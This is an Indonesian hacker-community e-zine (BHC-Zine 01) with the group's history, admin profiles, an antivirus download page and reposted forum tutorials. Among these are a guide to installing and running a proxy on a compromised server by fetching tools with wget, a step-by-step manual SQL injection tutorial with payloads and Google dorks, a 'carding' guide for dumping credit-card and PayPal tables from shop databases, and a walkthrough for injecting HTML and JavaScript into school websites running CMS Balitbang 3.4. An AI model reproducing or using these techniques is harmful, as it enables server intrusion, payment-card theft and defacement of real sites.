0

KATA PENGANTAR
Puji syukur kita haturkan kepada kehadirat Tuhan, atas nikmat iman, ukhwah dan silaturahmi ini
sehingga kekeluargaan kita tetap terbangun dan terawat di bawah naungan berbagai macam Agama.
Pembaca, semoga gemilang dengan kehadiran sebuah Magazine dari forum kami yaitu Bogor Hackers
Community (BHC) edisi pertama ini dapat bermanfaat bagi semua khususnya anggota atau member BHC,
beserta staff dan administrator. Dan juga semoga para pembaca tidak kecewa terhadap isi dari BHC-Zine
1 ini.

Mendidik dan mencerdaskan generasi muda bangsa merupakan kewajiban semua pihak, staff dan
administrator juga yang berpartisipasi dalam pembuatan BHC-Zine ini dengan pengalamannya dalam
bidang IT mencoba menularkan ilmu dan pengalamannya dalam sebuah magazine ebook ini.
Namun yang membuat karya ini lebih luar biasa adalah kerja keras menyusun ebook ini semata-mata demi
berbagi ilmu tanpa tujuan komersialisasi. Untuk itu ebook ini berlisensi free to public, atau GNU.
Sekian dan terima kasih atas dukungan dari pembaca dan perhatiannya. Dan kami sangat mengharapkan
donasi dan menjadi member aktif di http://bogorhacker.net/

Bogor, 23 September 2012

Sholahuddin Muhammad
(Administrator BHC)
 Daftar Isi
KATA PENGANTAR............................................................................................................................................................. 0
BHC-Zine 01 ....................................................................................................................................................................... 3
BHC Story .......................................................................................................................................................................... 4
BHC Admin Identity .......................................................................................................................................................... 6
BHC Founder ................................................................................................................................................................. 6
BHC Webcoder.............................................................................................................................................................. 6
2 BHC Administrator Naufal ............................................................................................................................................ 7
BHC Administrator Xevil ............................................................................................................................................... 7
BHC Administrator Dee Dwi......................................................................................................................................... 8
BHC Administrator Justinisal........................................................................................................................................ 8
BHC On Project ................................................................................................................................................................. 9
BHC[av] ......................................................................................................................................................................... 9
Download BHC[av] ...................................................................................................................................................... 10
BHC Articles .................................................................................................................................................................... 11
TOP 5 Articles .............................................................................................................................................................. 11
Enkripsi Page Source dengan Unescape String ....................................................................................................... 11
Decrypt Vigenere Cipher dengan Javascript ........................................................................................................... 13
Tutorial membuat Proxy di Shell Inject ................................................................................................................... 15
SQL Injection Full versi 4 dan 5 ............................................................................................................................... 16
[TUTORIAL] Step By Step Carding ........................................................................................................................... 20
BHC Articles plus 01 ........................................................................................................................................................ 24
CMS Balitbang 3.4 – Insert HTML Tag at Social Enginering Page ................................................................................ 24
BHC Articles plus 02 ........................................................................................................................................................ 29
Membuat Browser Sederhana dengan Visual Basic 6 ................................................................................................ 29
BHC Donation ................................................................................................................................................................. 32
Penutup ........................................................................................................................................................................... 33
DAFTAR PUSTAKA............................................................................................................................................................ 34
 BHC-Zine 01
BHC-Zine adalah sebuah buku elektronik buatan BogorHackers Community yang bertujuan untuk
menambah wawasan para pembaca tentang dunia IT atau dunia hacking seperti pembahasan mengenai
programming, networking, virus dan lain lain.

BHC-Zine 01 adalah edisi pertama yang akan kami hadirkan untuk anda, yang memungkinkan berisi tentang
identitas, sejarah, bahkan sampai para admin BogorHackers Community. Mungkin bahasan seperti itu
hanya ada pada edisi kali ini.
3

Diterbitkan oleh :
BogorHackers Community

Redaksi :
BHC-Crew

Desain Cover :
CyberKaze & xevil

:
Layouter
CyberKaze

Editor :
Justinisal

Distribusi :
All Members BogorHackers
 BHC Story

Terinspirasi dari suatu kejadian di shoutbox BHC yang kalau pada kumpul bikin ngakak  pastinya
bikin suasana forum menyenangkan. Muncul dibenak sang penulis "Apa sih alasan para admin atau
member bisa gabung di forum ini ?"

ini cerita sekaligus alasan sang penulis kenapa bisa disini :D

4
Pertamanya iseng iseng nyari, ada ga sih hacker bogor , eh akhirnya sang penulis nemuin forum
dengan domain yg dulu bogorhackers.com (kalo ga salah hehe.. aga lupa juga soalnya udah lama
kejadiannya) .. disitu sang penulis baru kenal dua orang admin yang paling tua :p maksudnya paling dulu
ada di forum, mereka adalah bhottu sang founder BHC dan om doey sang web coder BHC yang terkenal
dengan handphone Sonyericsson W200 nya yang konon keramat ga ada duanya. Nongkrong disitu dan
mulai lebih kenal dengan mereka dan member yang lainnya, domain pun berganti jadi bogor-h.org, disitu
sang penulis kenal juga dengan Dwi a.k.a X-Cisadane :D dia juga ngebantuin BHC saat rapuh hehe. Bukan
hanya itu, X-Cisadane pun menjadi member aktif di forum dan membangun forum bersama dengan
lainnya. Tapi pada saat bogor-h.org bhottu sang founder jarang terlihat bahkan hampir tidak pernah
melihat ada di forum .

Disana masih banyak error yang bergelimpangan, dan error yang paling sang penulis ingat adalah
error 404 dan error 500, mungkin bisa dibilang karena forum BHC dulu dibangun tanpa biaya sedikitpun,
karena bisa dibilang semua didapatkan dengan kegiatan hacking juga.. ya disamping biaya pulsa
handphone pastinya hehe. Mungkin dibenak kawan-kawan “loh? Ko pulsa handphone?” “Ya” Doey sang
web coder BHC memang lebih sering ngoprek forum bahkan melakukan kegiatan hacking lewat handphone
W200nya, itulah alasan mengapa disebut hp keramat doey haha . Bahkan sang penulis dan admin yang
lainnya pun hampir tidak percaya dengan handphone W200nya, disaat itulah terpikirkan oleh sang penulis
bahwa “Suatu yang canggih tidak selalu dibuat oleh benda yang canggih pula, tapi dengan mempunyai
rasa keinginan yang tinggi, seseorang dapat membuat sesuatu yang berguna bagi orang banyak”. Itulah
penyebab sampai susah ngakses forum BHC. Dua sampai tiga kali setau saya BHC dibangun ulang, sampai
sampai Doey hampir mau menutup forum BHC, tapi sayang menurut saya jika ditutup.. Karena disini pasti
banyak hacker muda yang belum mempunyai rumah.

Tapi itu dulu ! Sekarang ?

Seperti inilah BHC  walau masih dalam masa pertumbuhan, tapi kerennya 7 turunan hahaha. Domain
forum pun berganti menjadi http://bogorhacker.net .Ya dengan bantuan kawan-kawan baru kami yang
sekarang juga menjadi administrator BHC yaitu Tomi a.k.a xevil yang aktif juga di Indonesian Hacker Team
 dan Isal a.k.a justinisal yang aktif juga di forum Hacker-Newbie Community. Juga sang founder BHC yaitu
bhottu yang muncul kembali dan membagi ilmu-ilmunya kepada para member BHC.

Hampir ketinggalan, saat ditanyakan alasan mereka bergabung dengan BHC ada juga para admin
yang menyumbangkan suaranya, yaitu doey yang dengan niat membangun forum BHC ini bukan untuk
alasan yang lain-lain, atau cuma untuk berlaga yang paling pintar, tapi untuk belajar, sharing, menambah
teman, dan canda bareng walau cuma dalam dunia internet, dan beliau pun berkata “coba aja mereka
yang lebih pinter ato yang medium sekalipun. yang punya pengetahuan walo dikit tp di share. pasti bkal
saling berguna. buat masing masing dari kita”. Dan xevil yang berkeinginan membuat rumah untuk para
5 penggemar IT se-Bogor dan se-Indonesia.

Banyak kejadian , pengalaman dan ilmu pengetahuan yang kami dapat di BogorHackers, dan kami
harap kawan-kawan tertarik bergabung dengan kami dan saling bertukar informasi di forum tercinta ini.
Selanjutnya sang penulis akan memperkenalkan sedikit identitas para Administrator BogorHackers yang
biasa disebut sebagai BHC-Crew.
 BHC Admin Identity

BHC Founder

Nick : bh0ttu
Facebook : https://www.facebook.com/akubukanciter
Website : http://www.akubukancheater.info/
BIO : Seorang founder BogorHackers Community dan pelopor BHC [av] atau BHC
antivirus yang masih dalam pengembangan.

BHC Webcoder

Nick : Nduy a.k.a d0ey_Grunch

Facebook : https://www.facebook.com/doeyGrunch?fref=ts
Twitter : https://twitter.com/d0eyGrunch
BIO : Webcoder BogorHackers Community, terbiasa melakukan kegiatan hacking,
coding dengan menggunakan HP Sonyericsson W200 nya  Hape Keramat :D
 BHC Administrator Naufal

BIOGRAFI PENULIS :
7 Name : Fathin Naufal a.k.a CyberKaze,
Facebook : https://www.facebook.com/nnamikazen
Twitter : https://twitter.com/naufalnkz
Website : http://cyberkaze.co.cc/
E-Mai : cyberkaze@gmail.com

BIO : merupakan siswa SMAN 10 Bogor (2010 – 2013). Penulis masih banyak belajar tentang dunia IT, dari
programming hingga desain grafis. Penulis juga member aktif di BogorHackers Community dan salah satu
Administrator di BogorHackers Community. There is No Perfect Security in Virtual World

BHC Administrator Xevil

BIOGRAFI PENULIS :
Name : Tomi a.k.a xevil,
Facebook : http://www.facebook.com/1463482790
Twitter : http://www.twitter.com/tomi_riddle
Blog : http://imnothacker.co.vu
E-Mail : tomi.riddles@yahoo.com | xevil@iht.or.id | xevil@bogorhacker.net
BIO : merupakan lulusan SMKN 1 Bogor tahun 2010. Kini bekerja sebagai Desain Grafis dan merangkap
sebagai salah satu Administrator aktif di BogorHackers Community. Penulis merupakan member aktif dari
BogorHackers Community dan Indonesian Hacker Team. I’m Not Hacker, but I’m Crawler
 BHC Administrator Dee Dwi

Name : Dwi a.k.a X-Cisadane

8
Facebook : https://www.facebook.com/steevee.aka
Bio :
Setelah menamatkan pendidikan Sekolah menengah Atas, kemudian melanjutkan pendidikannya di
Perguruan Tinggi Swasta jurusan Sistem pendidikannya di Gunadarma Depok, Indonesia. Sebagian besar,
ilmu yang dimilikinya di dapat dari dunia maya dan dari penelitiannya yang secara otodidak. Penulis juga
aktif dalam beberapa Forum Diskusi yang membahas Dunia Underground seperti : Xcode, Codenesia,
BorneoCrew, DepokCyber, Cisadane Hacker Community, Muslim Hackers, Dunia Santai dan yang lainnya

BHC Administrator Justinisal

Name : Sholahuddin Muhammad

Nick : Justinisal or Justin Isal
Facebook : https://www.facebook.com/justinisal.fanspage
Twitter : https://twitter.com/justinisal
Blog : http://justin-isal.co.cc (web portal masih dalam tahap coding template mewek T_T )
LostSaga Nick : 666cullens *mainnya cuman teken D, D, D, arah dua kali :p*
Bio : Seorang siswa dari MAN 2 Kota Bogor (2010 – 2013) . Editor aktif dalam dunia IT, dan
masih dalam tahap belajar dan focus pada security, programming, dan computer accounting. Editor juga
aktif di forum Hacker Newbie Community, dan Kaskus. Editor juga aktif di https://www.freelancer.com
SAYA BUKAN MAHO -_-“ saking lama menjomblo 1,3 tahun sekarang ah.
“inilah jaman dimana remaja nulis bio, panjang bener kaya riwayat hidup sama curhat (T_T)”
 BHC On Project
Bogor Hackers Community memang masih dibilang forum baru bahkan komunitas yang baru
terbangun dan masih dalam tahap pengembangan. Tapi itu bukanlah sebuah halangan bahwa dengan
keadaan yang baru dan masih belum stabil, founder BHC yang biasa disapa dengan “bh0ttu” telah
menciptakan sebuah antivirus dan masih dalam tahap pengembangan. Pada BHC-Zine kali ini kami akan
menjelaskan sedikit kepada teman – teman tentang BHC[av] ini.

9 BHC[av]

BHC[av] adalah antivirus lokal tak berbayar alias gratis yang dapat anda download langsung di
website kami, antivirus ini di buat semata-mata karena kepedulian kami untuk memerangi para virus
maker, khususnya di Indonesia. Antivirus ini dapat berjalan dengan baik pada Windows 7, 2000, XP atau
Vista.
Di design agar mampu membersihkan virus-virus lokal dan nonlokal, tampilan di buat simple dan
elegant untuk mempermudah user dalam penggunaan BHC[av]. Antivirus ini mampu melakukan scanning
hingga 3000 file / 35s.
BHC[av] bebas digunakan dan disebarluaskan, dengan syarat tidak memodifikasi, tidak menambah
atau menghapus file-file yang ada dalam Folder BHC[av], tidak untuk kepentingan KOMERSIAL.
jika Anda adalah Donatur BHC[av], Anda boleh menggunakan BHC[av] kepentingan komersial atau profit.
BHC[av] di buat dengan harapan dapat di gunakan sepenuhnya dan membersihkan virus-virus yang ada.
 Untuk segala kerusakan yang terkait dengan penggunaan BHC[av] di luar tanggung jawab
programmer. Kami selalu berusaha semampu kami untuk memberikan yang terbaik untuk teman-teman
semua para pengguna komputer di indonesia,
BHC[av] sadar masih banyak kekurangan yang ada pada program kami, maka dari itu kami
menerima apapun kritik dan saran kalian. Jika ada virus yang tidak mampu BHC[av] deteksi, anda bisa
mengirim sample virus untuk kami analisis atau mungkin dari kalian ingin bekerja sama dalam
pengembangan BHC[av] atau ingin, mejadi donatur kami? Jika tertarik maka anda bisa menghubungi
bh0ttu@akubukancheater.info .

10
Download BHC[av]
Dengan dirilisnya BHC[av] v1.0 Beta kami telah menyediakan beberapa link untuk mendownload
BHC[av]. Hal ini bertujuan untuk mencoba dan menganalisa apa ada bug atau error pada BHC[av], jika
menemukan bug / error bisa diinformasikan kepada bh0ttu@akubukancheater.info .

Berikut link download yang telah kami sediakan :

 Download via MediaFire : http://www.mediafire.com/?5z3gcqar06cz44g

 Download via 4shared : http://www.4shared.com/file/J1Jhbttt/BHCsetup.html
 Download via ziddu : http://www.ziddu.com/download/20418535/BHCsetup.exe.html
password: bhcanvir

Hingga pembuatan BHC-Zine 01 ini, BHC[av] sudah mengeluarkan versi terbarunya yaitu V2.3 yang bisa
anda download di : http://anvir.bogorhacker.net/general/download-bhcav23/

Jika Antivirus tidak berjalan dengan benar, ada kemungkinan beberapa file penting tidak ada dalam folder
dimana anda menyimpan BHC[av], pastikan pada folder anda menyimpan BHC[av] memiliki file-file di
bawah ini:

- bhcdatathz.dll http://www.mediafire.com/?7e3tbt09xq4esgl
- FileRegister.bat http://www.mediafire.com/?ymx96ogk52hyadl
- FiRecobotuthz.bat http://www.mediafire.com/?s423vd524a00b8x
password: bhcanvir

dan jika file" tersebut hilang atau terhapus silahkan install ulang kembali BHCsetup.exe bila masih memiliki
file installer nya, atau bisa download manual di website yang telah kami sediakan diatas.
 BHC Articles
Dalam sebuah Zine atau yang biasa kita kenal dengan sebutan e-book, terasa kurang lengkap jika
tidak disertakan sebuah artikel-artikel yang menarik dan berisi ilmu pengetahuan. Oleh karena itu BHC-Zine
akan memberikan beberapa artikel yang patut untuk teman-teman baca dan sayang untuk dilewatkan,
selain itu BHC-Zine juga menyertakan 5 TOP Articles dari forum yang telah kami seleksi terlebih dahulu
mana artikel atau thread yang patut dimasukkan ke BHC-Zine.

11
TOP 5 Articles

Enkripsi Page Source dengan Unescape String

Kadang kala ketika kita membuat sebuah website, ada sedikit rasa kesal kalo source code yang
sudah susah-susah kita bikin malah ditiru oleh orang lain. Mungkin thread ini bisa sedikit mengatasi
masalah tersebut :sip
Unescape String merupakan sebuah fungsi yang berguna untuk mendecode(Menerjemahkan) suatu
string yang telah di encode-kan(Tulisan dalam format HexaDecima) menjadi suatu tulisan yang dapat kita
baca(Tulisan dalam format Alphabet). Misalnya saja nilai Hexa 5A jika di decode(Diterjemahkan) akan
menjadi huruf alphabet Z.

POC (Piye Om Carane), begini lho :

1. Masuk ke website http://adf.ly/DR0IH

2. Buka source code anda, copy lalu paste di "Place Plain Source Here and Hit Encode "
3. Lalu tinggal pencet Encode, nanti muncul deh stringnya
 Trus, gimana mengimplementasikannya?

Buka Notepad, lalu tulis :

<script language="javascript">
<!--
document.write(unescape("STRING UNESCAPE"));
12 //-->
</script>

Nah, tulisan STRING UNESCAPE tadi ganti dengan string anda, contoh terdapat pada link berikut ini :

http://bogorhacker.net/web-programming/572-enkripsi-page-source-dengan-unescape-string.html

Dan selesai, tinggal di save deh. silahkan dicoba ya om ...

NB : source tidak kami sertakan dalam BHC-Zine dikarenakan source yang terlalu panjang dan sbagai gantinya kami sertakan link
yang menuju source tersebut

Thread Starter :
 TOP 4 Articles

Decrypt Vigenere Cipher dengan Javascript

Vigenere chiper merupakan salah satu algoritma kriptografi klasik untuk menyandikan suatu
plaintext dengan menggunakan teknik substitusi.Vigenere cipher pada dasarnya cukup rumit untuk
13 dipecahkan. Meskipun begitu, Vigenere cipher tetap memiliki kelemahan. Salah satunya adalah dapat
diketahui panjang kuncinya dengan menggunakan metode kasiski. Hal ini disebabkan karena umumnya
terdapat frasa yang berulang-ulang pada ciphertext yang dihasilkan.

Enkripsi : Ci= (Pi+Ki) mod 26

Deskripsi : Pi= (Ci+Ki) mod 26

Untuk menyandikan pesan, digunakan sebuah pesan alphabetis yg di urut, dan di geser 1 shift untuk
alphabet yg selanjut nya.

ABCDEFGHIJKLMNOPQRSTUVWXYZ
BCDEFGHIJKLMNOPQRSTUVWXYZA
CDEFGHIJKLMNOPQRSTUVWXYZAB
Dst..

1. Contoh penyelesaian vigenere chiper sederhana:

Plainteks : azizul hakim prabowo

Key : inform atika informa
Maka, akan di dapat kan chiperteks :
imnokx atssm xefpfio

2. Penyelesaian vigenere chiper menggunakan pembangkit kunci euler

Plainteks : KILL KING TONIGHT OR DIE

Key : BUDI

E=
2.71828182845904523536028747135266249775724709369995957496696762772407&#&#&#&#&#&#&#
&#…
 ambil banyak digit sesuai dengan panjang plainteks (18)
Ubah key menjadi angka, 1 20 3 8
setelah itu kalikan dengan bilangan euler
12038 x 27182818284590452353 = 327226766509899865425414
Pisahkan 3 sesuai banyak nya palinteks 3 27 2 26 76 6 50 98 9 98 65 4 25 41 4
Kemudian ubah bentuk menggunakan mod 26 = D B C CG Y G FA U J JI N E CF P E

14 Akhir :
Plainteks : KILL KING TONIGHT OR DIE
Key : DBCC GYGF AUJJINE CF PED
Chiperteks : NJNN QGTL TIWROUX QW SMH

Source Code :
http://bogorhacker.net/keamanan-jaringan-dan-cryptography/530-decrypt-vigenere-cipher-dengan-javascript.html

NB : source tidak kami sertakan dalam BHC-Zine dikarenakan source yang terlalu panjang dan sbagai gantinya kami sertakan link
yang menuju source tersebut

Thread Starter :
 TOP 3 Articles

Tutorial membuat Proxy di Shell Inject

1. cari folder yang permision 777 (drwxrrwxrwx) dengan menggunakan command

“find / - tipe d -perm 777”
15 kalo dah ketemu… masuk ke folder tersebut…

2. download file proxy.tgz ini dengan menggunakan command “wget nurfitra-

budiana.com/files/proxy.tar.gz” atau “lwp-download nurfitra-budiana.com/files/proxy.tar.gz“.

Kalo masih tetep gak bisa.. dengan terpaksa kamu harus dunlut file proxy.tgz trus upload ke shell inject-an
kamu tadi… kalo dah ter download atau upload file proxy.tgz-nya… kamu boleh masuk ke no.3

3. extra’ file proxy dengan menggunakan command “tar -zvxf proxy.tgz” nanti akan menghasilkan folder
“pro” pada folder yang 777 tadi…

4. masuk ke folder “pro” dengan menggunakan command “cd pro”

5. kemudian execute menggunakan command “./xh -s “/usr/local/apache/bin/httpd -DSSL””

6. execute sekali lagi menggunakan command “./prox -a -d -p1810” dimana angka pada -p1810 itu
digunakan sebagai port… terserah kamu buat port brapa.. yang penting jangan menggunakan kepala angka
0 ex: 0932 atau apalah.. kalo bisa kamu lihat hasil nomor hari ini di http://www.totobet.net]totobet.net
hari ini… heuheuehue

7. Sukses
Nah.. Untuk menggunakan proxy tersebut… dimana dns website itu sebagai nomor proxy… dan nomor
togel yang di -p1810 itu, itu adalah nomor port…
Nb : jika file poxy.tgz sudah mati, hubungi pos satpam terdekat 

Thread Starter :
 TOP 2 Articles

SQL Injection Full versi 4 dan 5

Sebenarnya ada saja software untuk SQl Injection yang OTOMATIS tanpa ngetik sendiri perintah
SQL... cuman kalau pakai yang OTOMATIS langsung kan belum tau bagaimana cara kerjanya software
16
tersebut... kapan bisanya kalau ketergantungan software mulu... jadi mending yang MANUAL biar terlihat
lebih "COOL"..
mari kita mulai... =))

Pengertian sql injection:

SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi
perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi
yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:

karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

-=[step Satu]=-
carilah target, misal:
DORK: allinurl:/review.php?id=586

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan
error. contoh:
[site]review.php?id=586' atau
[site]/review.php?id=-586

sehingga muncul pesan error seperti ini.

Contoh:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
/home/nowt2do/public_html/review.php on line 19
dll...
 -=[step Dua]=-
mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh:
[site]/review.php?id=-586+order+by+1-- atau
[site]/review.php?id=-586+order+by+1/*

17 ceklah secara step by step (satupersatu)... misal:

[site]/review.php?id=-586+order+by+1--
[site]/review.php?id=-586+order+by+2--
[site]/review.php?id=-586+order+by+3--
[site]/review.php?id=-586+order+by+4--

sehingga muncul error atau hilang pesan error...

Contoh:
Unknown column '9' in 'order clause'
[site]/review.php?id=-586+order+by+9--

berarti yang kita ambil adalah sampai angka 8 menjadi :

[site]/review.php?id=-586+order+by+8--

-=[step Tiga]=-
untuk mengeluarkan angka berapa yang muncul gunakan perintah union, karena tadi error sampai angka 9
maka:
[site]/review.php?id=-586+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5, gunakan perintah version() atau @@version untuk mengecek versi sql yg
diapakai masukan perintah tsb pada nagka yg keluar tadi
misal:
[site]/review.php?id=-586+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/review.php?id=-586+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak
sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah
From+Information_schema..
 untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini
bisa menggunakan perintah From+Information_schema..

-=[step Empat]=-
untuk menampilkan table yg ada pada web tsb adalah perintah table_name >>> dimasukan pada angka yg
keluar tadi perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

[site]/review.php?id=-586+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--
18
seumpama table yang muncul adalah "admin"

-=[step Lima]=-
untuk menampilkan semua isi dari table tsb adalah perintah group_concat(table_name) >>> dimasukan
pada angka yg keluar tadi perintah +from+information_schema.tables+where+table_schema =database()
>>> dimasukan setelah angka terakhir

[site]/review.php?id=-586+union+select+1,2,3,4,group_concat(table_name),
6,7,8+from+information_schema.tables+where+table_schema=database()--

-=[step Enam]=-
perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi perintah
+from+information_schema.columns+where+table_name= 0xhexa-- >>> dimasukan setelah angka terakhir

[site]/review.php?id=-586+union+select+1,2,3,4,group_concat(column_name)
,6,7,8+from+information_schema.columns+where+table_name=0xhexa--

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara
mengkonversinya

website yg digunakan untuk konversi :

http://home.paulschou.net/tools/xlate/

contoh kata yg ingin di konversi yaitu "admin" maka akan menjadi 61646D696E

[site]/review.php?id=-586+union+select+1,2,3,4,group_concat(column_name)
,6,7,8+from+information_schema.columns+where+table_name=0x61646D696E--
 -=[step Tujuh]=-
memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara perintah concat_ws(0x3a,hasil isi
column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

[site]/review.php?id=-586+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table

berasal)--

19 contoh kata yang keluar adalah id,username,password

[site]/review.php?id=-
586+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--

-=[step Delapan]=-
cari halaman loginnya,,, halaman yg sering yaitu :

admin.php
administrator.php
wp-admin --->wordpress
dll :)

Semoga Bermanfaat =))

Thread Starter :
 TOP of The TOP Articles
Oke, TOP of The TOP memang cocok untuk suatu artikel atau thread yang paling bagus dan menarik
pada saat BHC-Zine 01 ini dibuat, dan tanpa basa-basi TOP Thread Starter pun diraih oleh :

TOP Thread Starter :

20

[TUTORIAL] Step By Step Carding

Berjumpa lagi dengan ane gan,

kali ini ane share tutorial carding, tapi ini agak sepenuhnya ga dapat targetnya susah gan jadi harus coba
yang lain.
tapi di thread ini ane kasih tau softwarenya cara makenya kalau soal hasil carding agak susah

Persiapan software :

# GOOGLE URL EXTRACTOR

# SQL Exploiter
Cari sendiri di google banyak oh iya salah satu software ini terdapat virus tapi ga berbahaya amat gan

Kita mulai dari #Google Url Extractor

1. Buka Google Url Extractor.exe

2. Lalu masukkan dork product.asp?id= site:

(terserah mau com, net, co.uk, il,us,dll usahakan yg berbasis di eropa dan AS, soalnya rata2 produk mereka
di jual dengan transaksi Credits Card dan PayPal)

3. Disini aku menggunakan product.asp?id= site:com atau kalau mau ngikutin si Setan Maha Esa alias ichito
bandito cari aja fbnya wkwakwkak peace bang product.asp?id= site:co.il jadi harus co.il targetnya israel
 4. Terus scan, kalau sudah "found link" Remove duplicated

21

5. Lalu pindah ke tab SQL Injector query builder

6. Masukan argumen tanda tanya(?)di insert arguments here

7. if finish, click bulid and next you scan !

8. Terus pindah ke tab berikutnya Attack Victim

 9. Cari yang result errornya :
"unclosed quotation mark before the character" (Ane ga tau kenapa harus yang ini. pokonya ini aje )

22

Langkah selanjutnya pemakaian SQL Exploiter

1. Buka Sqlnya

2. Terus langsung menuju TAB Attacker for Hackable !

3. Click add manually, dan paste hasil copy dari yang di attack victim (Google url extractor), dan hilang
tanda '
 4. Next Clik Site info, tunggu hingga infonya keluar !

5. Kalau sudah keluar maka tinggal get tables

6. Nanti akan muncul table table web tersebut

7. kalau sudah, pilih salah satu table yang kira2 didalamnya terdapat CC atau Paypal, Dan biasanya table ini
23 terdapat nama "Order" "buy"

8. Terus get column untuk mengetahui apa saja yang ada di table tersebut

9. Nanti kalau sudah semua, blok semua column langsung click get data

Sekian dan terima kasih :)

Maaf kalau jelek cuman bisa segini tutornya :wc

BHC TOP Articles

Itulah 5 TOP Articles yang terpilih sebagai yang terbaik di BHC-Zine 01, dan kami BHC-Crew tidak
hanya menampilkan thread terbaik diforum saja. Tapi juga akan memberikan beberapa artikel yang telah
dibuat untuk BHC-Zine 01 ini,
 BHC Articles plus 01
CMS Balitbang 3.4 – Insert HTML Tag at Social Enginering Page

24

Pasti semua sudah tau kan apa itu CMS? Saya akan menjelaskan sedikit. CMS (Content
Management System) adalah sebuah sistem yang dibuat untuk memudahkan penggunanya dalam
membuat sebuah website dinamis. Salah satu CMS yang banyak digunakan adalah Joomla, WordPress, dan
masih banyak lain nya.
Di Indonesia, Tim Balitbang dari Depdiknas menciptakan sebuat CMS bernama CMS Balitbang untuk
memudahkan pembuatan website untuk sekolah-sekolah di Indonesia.
Kali ini saya akan membahas sebuah cara untuk memasukan Tag HTML kedalam halaman website yang
menggunakan CMS Balitbang v.3.4.
Pada CMS Balitbang v.3.4 ada sebuah Fitur seperti Social Enginering yang memungkinkan kita untuk
bersosialisasi dengan sesama Murid, Alumni, maupun Guru-guru disekolah tersebut.

Halam Login :
 Halaman Utama :

25

Bentuk Social Engineringnya mirip Facebook jaman dulu ya? Hihi.. Mungkin Tim Balitbang terinspirasi dari
Facebook

Oke lanjut, kita lihat pada menu Profil, ternyata ada submenu Custome Themes. Brarti kita bisa merubah
Themesnya sesuka kita dong? Ayo kita coba.

Ternyata disitu disediakan sebuah textarea untuk kita masukan script CSS yang gunanya untuk mengatur
bentuk dan tampilan halaman kita. Wah yang ini mirip Friendster jaman dulu yah
 Lalu, apa benar kita cuma bisa memasukan script CSS saja? Mari kita bereksperimen Coba kita masukan
sebuah kata biasa kedalam textarea tersebut di bagian paling bawah.

26

Setelah itu save, dan kita lihat halaman utamanya. Setelah berhasil akan muncul tulisan ” Perubahan
custom template berhasil dilakukan “. Coba kita intip celana dalem source kode nya

Tulisan kita nongol tuh, ada di barisan paling akhir sebelum tag </style>. Itu artinya tag </style> muncul
otomatis sebagai tanda bahwa script CSS berakhir disitu.

Lalu apa yang terjadi jika kita memasukan tag </style> kedalam textarea? Artinya kita membuat baris akhir
dari CSS website tersebut, dan area dibawahnya menjadi kosong dan bisa kita isi

Mari lanjut ke experimen ke 2, coba kita masukan tag seperti ini :

</style>
<center>
<h1>
<font color=”#0000ff”> My name is Tomi a.k.a xevil</font>
</h1>
</center>
<style>

Lalu simpan dan kita lihat halaman kita.

 Wow, tulisan yang kita buat dengan tag HTML tadi muncul Lalu kenapa tadi saya menambahkan
tag <style> ? Seperti yang sudah dijelaskan di atas, pada source kode akan otomatis muncul
tag </style> dibelakang script yang kita masukan pada textarea. Itu lah alasannya kenapa saya
menambahkan tag <style> di akhir script, supaya nantinya script yang kita buat tidak berantakan.

27

Mari kita lihat Source kodenya :

Sudah mengerti kan? Selamat ! sekarang anda bisa menambahkan script sesuka anda di halaman Profil.
Lalu apakah hanya HTML? tentu tidak, kita pun bisa memasukan Javascript ke halaman tersebut. Semua
terserah anda, selamat bereksperimen
Note : untuk mencari situs yang menggunakan CMS Balitbang, anda bisa menggunakan dork ini di google :
inurl:”.sch.id” intext:”Tim Balitbang Depdiknas versi 3.4″
28

BIOGRAFI PENULIS :
Tomi a.k.a xevil, merupakan lulusan SMKN 1 Bogor tahun 2010. Kini bekerja sebagai Desain Grafis dan
merangkap sebagai salah satu Administrator aktif di BogorHackers Community. Penulis merupakan
member aktif dari BogorHackers Community dan Indonesian Hacker Team.
I’m Not Hacker, but I’m Crawler

Facebook : http://www.facebook.com/1463482790
Twitter : http://www.twitter.com/tomi_riddle
Blog : http://imnothacker.co.vu
E-Mail : tomi.riddles@yahoo.com | xevil@iht.or.id | xevil@bogorhacker.net
 BHC Articles plus 02

Membuat Browser Sederhana dengan Visual Basic 6

Anda pernah berfikir bagaimana cara membuat suatu browser seperti Mozilla Firefox, Google
Chrome, Opera dan lain-lain ? Pada artikel kali ini saya mencoba membuat sebuah browser sederhana yang
29 nantinya bisa dikembangkan lagi agar lebih baik. Oke langsung kita bahas cara-caranya.

Kita akan memerlukan beberapa komponen yaitu :

 1 Form
 4 Command Button
 1 Text Box
 1 Microsoft Internet Controls

Pada artikel ini saya membuat sebuah form seperti pada gambar :

Ganti Caption 4 command button tersebut dengan Back , Forward , Go , Refresh dan hapus caption
untuk TextBox agar terlihat bersih. Disini saya juga mengganti nama masing masing command button
dengan back , forward, go , refresh dan untuk textbox saya beri nama address . Nama bisa menyesuaikan
sesuai keinginan.
 Sekarang tambahkan komponen Microsoft Internet Controls, dengan membuka menu Project ,
Components atau CTRL + T. Klik Microsoft Internet Controls lalu Oke.

30

